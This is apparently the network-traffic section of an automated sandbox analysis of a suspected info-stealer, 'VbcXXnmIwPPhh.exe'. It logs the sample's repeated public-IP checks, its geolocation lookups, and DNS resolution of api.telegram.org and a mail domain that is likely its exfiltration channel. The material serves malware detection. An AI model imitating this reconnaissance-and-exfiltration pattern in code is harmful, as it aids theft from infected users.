                                                            Sep 26, 2024 13:44:18.155852079 CEST1.1.1.1192.168.2.70x4c0aNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                            Sep 26, 2024 13:44:18.155852079 CEST1.1.1.1192.168.2.70x4c0aNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                            Sep 26, 2024 13:44:23.128668070 CEST1.1.1.1192.168.2.70x2187No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                            Sep 26, 2024 13:44:29.537338972 CEST1.1.1.1192.168.2.70x56a0No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                                            Sep 26, 2024 13:47:56.949667931 CEST1.1.1.1192.168.2.70x55d3No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                            Sep 26, 2024 13:47:56.949667931 CEST1.1.1.1192.168.2.70x55d3No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                            • reallyfreegeoip.org
                                                            • api.telegram.org
                                                            • checkip.dyndns.org
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.749701132.226.8.169804888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 26, 2024 13:44:04.831887960 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 26, 2024 13:44:08.174153090 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:08 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Sep 26, 2024 13:44:08.179656029 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Sep 26, 2024 13:44:08.521030903 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:08 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Sep 26, 2024 13:44:09.271049976 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Sep 26, 2024 13:44:10.228789091 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:10 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.749707132.226.8.169804888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 26, 2024 13:44:11.014173031 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Sep 26, 2024 13:44:12.383827925 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:12 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.749709132.226.8.169804888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 26, 2024 13:44:13.010843992 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 26, 2024 13:44:14.390242100 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:14 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Sep 26, 2024 13:44:14.390527964 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:14 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.749711132.226.8.169804888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 26, 2024 13:44:15.083157063 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 26, 2024 13:44:15.913089037 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:15 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.749713132.226.8.169804888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 26, 2024 13:44:16.863032103 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 26, 2024 13:44:17.661098003 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:17 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.749718132.226.8.169804888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 26, 2024 13:44:18.312475920 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 26, 2024 13:44:19.110460043 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.749720132.226.8.169804888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 26, 2024 13:44:20.084980965 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 26, 2024 13:44:20.990175009 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:20 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.749724132.226.8.169804888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 26, 2024 13:44:21.603833914 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 26, 2024 13:44:22.485083103 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:22 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.749705188.114.96.34434888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-26 11:44:09 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-09-26 11:44:09 UTC678INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:09 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 15881
                                                            Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=soCFaHSss%2BIY0ZCcPrlZpk6adMvmkGbvI7eDVpZIZIfML4nGniRhi3T2fiLYub%2BzEK5yVNsXZ%2FbiHraZTgJwdlaAK4xdU1%2FJpupPa5vfpErDjW8NODKCSHLMvVgPBvm3W5hu0dAN"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c9300196e23432b-EWR
                                                            2024-09-26 11:44:09 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-26 11:44:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.749706188.114.96.34434888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-26 11:44:10 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-09-26 11:44:10 UTC690INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:10 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 15882
                                                            Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8I7q0rDNQS%2Fg%2B7t%2B7e49OyUHVOfHjFElDpv0y%2FC6uHOjF%2BQHDO9D%2B%2BZUQ%2F1ARTFsksrIAVisMoSLOiKXRV99ATQrVqnVm7eR3dcHDLblmLE1wXfekg%2FJgHfo6VKhy6pl7ve%2Fh2zS"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c9300246d0b2365-EWR
                                                            2024-09-26 11:44:10 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-26 11:44:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.749708188.114.96.34434888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-26 11:44:12 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-09-26 11:44:12 UTC684INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:12 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 15884
                                                            Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=slHlDaRvOlyz94KZl7X3nJgrQhEft1S%2B5hydCsFLBWK8%2BBb%2FMQlSWcv%2FTUq6xMJh%2FRn5pIiXQ9Z0JoJH0pmEE54bqW00l%2BE19aSrNjq7tdWD33cRsmauebyhoS%2FWE8EiCZdpP6U8"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c930030d9d7c34b-EWR
                                                            2024-09-26 11:44:12 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-26 11:44:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.749710188.114.96.34434888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-26 11:44:14 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-09-26 11:44:15 UTC674INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:15 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 15887
                                                            Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z9R1ME7PrhhyFvhakUPR7LXc2k40Sr1kxDLQpACaMSepL9W1qfCq06xURubTieNgeNAiThQNzZx0sdc9z%2F17yKlzvQq5PJiB1oV8Ee%2FwaLoxR6GIErX5dORXacDB8Hsj9skWjXPi"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c93003ddc1f42fb-EWR
                                                            2024-09-26 11:44:15 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-26 11:44:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.749712188.114.96.34434888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-26 11:44:16 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-09-26 11:44:16 UTC676INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:16 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 15888
                                                            Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kUL4MsZcunGFezWAznFuzZSV5m18yvHELAtarMP4qB1IFLUEENDPU3OX%2BTdZbIJmiVnJTfcosNpByLjgFjiYPv%2FVmEVBtvWS10%2FMp0bT299mHq2ZZTLWqopn7OpmKjvXc7xSBQrX"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c930048e9c7c41b-EWR
